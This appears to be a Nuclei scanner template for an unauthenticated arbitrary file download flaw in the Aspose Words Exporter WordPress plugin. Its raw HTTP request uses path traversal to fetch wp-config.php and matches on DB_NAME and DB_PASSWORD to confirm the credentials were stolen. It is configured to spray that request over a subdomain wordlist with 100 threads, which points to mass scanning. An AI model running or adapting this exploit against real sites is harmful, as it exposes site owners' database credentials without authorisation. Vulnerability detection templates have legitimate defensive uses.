id: aspose-words-file-download

info:
  name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7869
    - https://wordpress.org/plugins/aspose-doc-exporter
  tags: wordpress,wp-plugin,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
